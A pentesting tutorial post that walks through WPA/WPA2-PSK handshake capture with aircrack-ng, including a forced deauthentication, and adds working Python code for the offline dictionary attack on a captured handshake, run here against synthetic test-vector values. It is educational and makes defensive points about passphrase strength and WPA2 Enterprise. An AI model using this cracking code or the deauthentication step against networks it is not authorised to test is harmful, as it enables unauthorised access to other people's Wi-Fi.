Every wireless pentester has to start somewhere. This is that somewhere.

Before you worry about WPA3, enterprise attacks, rogue APs, or EAP-TLS, you need to genuinely understand why WPA2 Personal is weak by design: its entire security rests on one shared passphrase. Not just that it can be cracked, but why it can be, and exactly what’s happening at each step when it is.

That understanding is what separates people who follow tutorials from people who actually know what they’re doing.

What’s happening in this video

This is a full walkthrough of cracking a WPA/WPA2 PSK using the aircrack-ng suite — the standard toolkit for wireless testing that’s been baked into BackTrack and Kali Linux for years.

Here’s the attack flow, step by step:

1. Monitor mode

First, the Alfa AWUS036H USB WiFi adapter gets put into monitor mode (airmon-ng, part of the suite, does this for you). This is the foundation of everything in wireless pentesting. In managed mode the driver only hands you frames for the network you’re associated with; in monitor mode it hands you every 802.11 frame on the channel the card is tuned to, management and control frames included, without associating with anything. Two caveats: the card only listens to one channel at a time, and not every adapter and driver supports monitor mode and packet injection, which is why the AWUS036H has been a classic choice. If you’re new to this, getting comfortable with your adapter and drivers before anything else is time well spent.

2. Scanning with airodump-ng

With monitor mode enabled, airodump-ng is locked to channel 6 and writes everything it sees to a capture file. This is where you gather the information you need: the target BSSID, the channel it’s broadcasting on, and, critically, whether there are any associated clients (the STATION column). Locking the channel matters: if airodump-ng is hopping, it will be listening somewhere else when the handshake goes by. And a client that is merely connected is not enough on its own, because its keys were negotiated when it associated; you only see the handshake at a (re)connect. No clients, no handshake. That’s the constraint.

3. The deauthentication attack

Once an associated client is found, aireplay-ng is used to send deauthentication frames to it, forged so they appear to come from the AP. The idea is simple: force the client off the network so it has to reconnect. When it does, the four-way WPA handshake happens, and that’s what you’re capturing: the AP’s ANonce (in message 1 or 3) and the client’s reply (message 2), which carries the SNonce and a MIC computed from a key derived from the passphrase. This only works because WPA2 management frames are unauthenticated; with 802.11w Protected Management Frames enabled (mandatory in WPA3) the client discards the forged deauth.

This is the bit that surprises most people when they first learn it. You’re not breaking the encryption. The handshake never sends the passphrase, or even the key derived from it; it sends two nonces and a MIC that only someone holding the right key could have computed. That is the material that proves the client knows the password, and the check is one you can repeat offline: derive a candidate key from a guessed passphrase and the SSID, redo the client’s MIC computation, and see whether it matches.

4. Cracking the PSK

With the handshake captured, airodump-ng is stopped and aircrack-ng is run against the capture file using a dictionary. In this demo, the example wordlist that ships with aircrack-ng is used. In the real world, you’d use something like rockyou.txt, and you’d be surprised how often that’s enough. Each guess costs 4096 PBKDF2-HMAC-SHA1 iterations (the step that turns passphrase and SSID into the PMK), which is why this is slow on a CPU and why precomputed tables are only useful against one specific SSID.
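
To make the “why” of steps 3 and 4 concrete, here is the offline cracking step written out in Python. This is an added example, not code from the video or from the aircrack-ng project: it builds a synthetic handshake reply (message 2) the way a client would, then recovers the passphrase from a wordlist the way aircrack-ng does. The key derivation (PBKDF2 to the PMK, the PRF to the PTK, the MIC over the EAPOL-Key frame) is the real 802.11i arithmetic and the SSID/passphrase pair is the published IEEE test vector; the MAC addresses, nonces, wordlist and the helper names (derive_pmk, derive_ptk, build_msg2, client_reply, crack_psk) are constructed for the demo.

```python
import hashlib
import hmac

# 802.11i constants (real protocol values)
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32
PTK_LEN = 48           # CCMP PTK: KCK(16) || KEK(16) || TK(16)
NONCE_OFFSET = 17      # Key Nonce position inside an EAPOL-Key frame
MIC_OFFSET = 81        # Key MIC position inside an EAPOL-Key frame
MIC_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iters, 256 bits).
    This is the expensive step; the SSID acts as the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, PMK_LEN)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, PTK_LEN)


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """EAPOL-Key message 2 (client -> AP) with an empty Key Data field.
    Real frames carry the client's RSN IE there; the layout is otherwise the same."""
    body = (b"\x02"                     # descriptor type: RSN
            + b"\x01\x0a"               # key info: HMAC-SHA1 MIC (v2), pairwise, MIC present
            + b"\x00\x10"               # key length 16 (CCMP)
            + (1).to_bytes(8, "big")    # replay counter
            + snonce                    # key nonce = SNonce
            + b"\x00" * 16              # key IV
            + b"\x00" * 8               # key RSC
            + b"\x00" * 8               # reserved
            + mic                       # key MIC (zero while it is being computed)
            + b"\x00\x00")              # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key


def compute_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC for descriptor version 2: HMAC-SHA1 over the frame with the MIC zeroed."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def client_reply(passphrase, ssid, ap_mac, client_mac, anonce, snonce):
    """What the station does on (re)connect: derive the PTK and sign message 2 with the KCK."""
    ptk = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    mic = compute_mic(ptk[:16], build_msg2(snonce))
    return build_msg2(snonce, mic)


def crack_psk(ssid, ap_mac, client_mac, anonce, msg2, wordlist):
    """What aircrack-ng does offline: redo the client's work per candidate, compare MICs."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        ptk = derive_ptk(derive_pmk(candidate, ssid), ap_mac, client_mac, anonce, snonce)
        if hmac.compare_digest(compute_mic(ptk[:16], msg2), captured_mic):
            return candidate
    return None


# Constructed demo values: MACs, nonces and wordlist are arbitrary; the network is
# the IEEE 802.11i PSK test vector (SSID "IEEE", passphrase "password").
SSID = "IEEE"
AP_MAC = bytes.fromhex("00112233aabb")
CLIENT_MAC = bytes.fromhex("ccddeeff0011")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["123456", "letmein", "password", "qwerty"]


def demo():
    """Capture the client's message 2, then crack it against the wordlist."""
    captured = client_reply("password", SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, captured, WORDLIST)


if __name__ == "__main__":
    print("PMK:", derive_pmk("password", SSID).hex())
    print("Recovered passphrase:", demo())
```

Swap in fields pulled from a real capture (BSSID, station MAC, the ANonce from message 1, the raw EAPOL frame of message 2) and the same crack_psk loop is the offline attack. Everything expensive sits in derive_pmk, which is exactly the step GPU crackers optimise, and nothing in the loop ever touches the network again.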

The important takeaway

The attack works because WPA2 Personal is a shared secret system. Everyone on the network uses the same pre-shared key, so one captured handshake from any client lets you test guesses against everyone’s password. If you can capture the handshake and you have the passphrase in your wordlist, you’re in. The strength of the network is entirely dependent on the strength of the passphrase, and most people are terrible at choosing strong passphrases.

This is exactly why enterprises don’t rely on WPA2 Personal: WPA2 Enterprise (802.1X with EAP) gives every user their own credential and every session its own keys, so there is no single shared secret to crack. And it’s why, when you see WPA2 Personal during a real engagement, it’s worth spending time on.

Get the handshake first. Worry about cracking it after.